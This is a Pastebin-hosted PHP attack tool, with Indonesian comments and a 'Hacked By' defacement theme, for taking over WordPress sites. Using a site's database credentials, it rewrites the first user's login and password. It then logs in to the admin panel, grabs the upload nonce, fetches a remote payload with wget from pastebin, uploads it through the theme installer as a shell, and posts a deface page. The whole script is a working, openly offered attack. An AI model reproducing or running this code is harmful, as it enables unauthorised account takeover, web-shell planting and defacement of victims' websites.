Advertisement
Tu5b0l3d

auto edit user and deface in Wordpress

Oct 15th, 2015
1,673
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.57 KB | None | 0 0
  1. <?php
  2. //Tu5b0l3d
  3. //IndoXPloit, HNc
  4. //http://indoxploit.blogspot.co.id/2015/10/auto-edit-user-and-deface-in-wordpress.html
  5.  
  6.     if($_POST){
  7.         $host = $_POST['host'];
  8.         $username = $_POST['username'];
  9.         $password = $_POST['password'];
  10.         $db = $_POST['db'];
  11.         $dbprefix = $_POST['dbprefix'];
  12.         $user_baru = $_POST['user_baru'];
  13.         $password_baru = $_POST['password_baru'];
  14.         $prefix = $db.".".$dbprefix."users";
  15.         $sue = $db.".".$dbprefix."options";
  16.          $tanya = $_POST['tanya'];
  17.          $target = $_POST['target'];
  18.          $nick = $_POST['nick'];
  19.         $pass = md5("$password_baru");
  20.        
  21.  
  22.         mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
  23.         mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
  24.  
  25.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  26.         $r=mysql_fetch_array($tampil);
  27.         $id = $r[ID];
  28.  
  29.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  30.         $r2=mysql_fetch_array($tampil2);
  31.         $target = $r2[option_value];
  32.          echo "# $target<br>";
  33.        
  34.  
  35.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
  36.  
  37.          
  38.  
  39.  
  40.             if($tanya=="y"){
  41.  
  42.     function ambilKata($param, $kata1, $kata2){
  43.     if(strpos($param, $kata1) === FALSE) return FALSE;
  44.     if(strpos($param, $kata2) === FALSE) return FALSE;
  45.     $start = strpos($param, $kata1) + strlen($kata1);
  46.     $end = strpos($param, $kata2, $start);
  47.     $return = substr($param, $start, $end - $start);
  48.     return $return;
  49. }
  50.  
  51.     function anucurl($sites){
  52.         $ch1 = curl_init ("$sites");
  53. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  54. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  55. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  56. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  57. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  58. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  59. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  60. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  61. $data = curl_exec ($ch1);
  62. return $data;
  63.     }
  64.  
  65.     function lohgin($cek, $web, $userr, $pass){
  66.         $post = array(
  67.                     "log" => "$userr",
  68.                     "pwd" => "$pass",
  69.                     "rememberme" => "forever",
  70.                     "wp-submit" => "Log In",
  71.                     "redirect_to" => "$web/wp-admin/",
  72.                     "testcookie" => "1",
  73.                     );
  74. $ch = curl_init ("$cek");
  75. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  76. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  77. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  78. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  79. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  80. curl_setopt ($ch, CURLOPT_POST, 1);
  81. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  82. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  83. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  84. $data6 = curl_exec ($ch);
  85. return $data6;
  86.     }
  87.  
  88. $site= "$target/wp-login.php";
  89. $site2= "$target/wp-admin/theme-install.php?upload";
  90. $a = lohgin($site, $target, $user_baru, $password_baru);
  91. $b = lohgin($site2, $target, $user_baru, $password_baru);
  92.            
  93.  
  94. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  95. echo "# token -> $anu2<br>";
  96.  
  97.  
  98.  system('wget http://pastebin.com/raw.php?i=mEQP6prW');
  99.  system('cp raw.php?i=mEQP6prW m.php');
  100.    
  101.   $post2 = array(
  102.                     "_wpnonce" => "$anu2",
  103.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  104.                     "themezip" => "@m.php",
  105.                     "install-theme-submit" => "Install Now",
  106.                     );
  107. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  108. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  109. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  110. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  111. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  112. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  113. curl_setopt ($ch, CURLOPT_POST, 1);
  114. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  115. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  116. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  117. $data3 = curl_exec ($ch);
  118.  
  119. $namafile = "wew.php";
  120. $fp2 = fopen($namafile,"w");
  121. fputs($fp2,$nick);
  122.  
  123. $y = date("Y");
  124. $m = date("m");
  125.  
  126.  
  127. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
  128. curl_setopt($ch6, CURLOPT_POST, true);
  129. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  130. array('file3'=>"@$namafile"));
  131. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  132. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  133. $postResult = curl_exec($ch6);
  134. curl_close($ch6);
  135.  
  136. $as = "$target/k.php";
  137. $bs = file_get_contents($as);
  138.  if(preg_match("#hacked#si",$bs)){
  139.                         echo "# <font color='green'>berhasil mepes...</font><br>";
  140.                         echo "# $target/k.php<br>";
  141.                     }
  142.                     else{
  143.                         echo "# <font color='red'>gagal mepes...</font><br>";
  144.                         echo "# coba aja manual: <br>";
  145.                         echo "# $target/wp-login.php<br>";
  146.                         echo "# username: $user_baru<br>";
  147.                         echo "# password: $password_baru<br>";
  148.  
  149.                        
  150.                     }
  151.  
  152.  
  153.  
  154.  
  155.         }
  156.  
  157.         elseif($tanya=="n"){
  158.             echo "# Sukses<br>";
  159.             echo "# username: $user_baru<br>";
  160.             echo "# password: $password_baru<br>";
  161.         }
  162.  
  163.  
  164.  
  165.     }else{
  166.             echo '<html>
  167.     <head>
  168.         <title>Wordpress Created New User</title>
  169.     </head>
  170.  
  171.     <body>
  172.             <center>
  173.                 <center><div id="button"></div>
  174.                         <h2>Wordpress Created New User</h2>
  175.                         <table>
  176.                             <tr><td><form method="post" action="?action"></td></tr>
  177.                             <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
  178.                             <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
  179.                             <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
  180.                             <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
  181.                             <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
  182.                             <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
  183.                             <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
  184.                               <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
  185.                          
  186.                             <tr><td><input type="text" name="nick" placeholder="Hacked By Tu5b0l3d"></td></tr>
  187.                             <tr><td><input type="submit" value="Ganti"></td></tr>
  188.                         </table>
  189.                         *nb: kalo milih y ... silahkan Ganti Form Hacked By Tu5b0l3d jadi Hacked by Nick_ente
  190.             </center>
  191.     </body>';
  192.         }
  193.  
  194. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement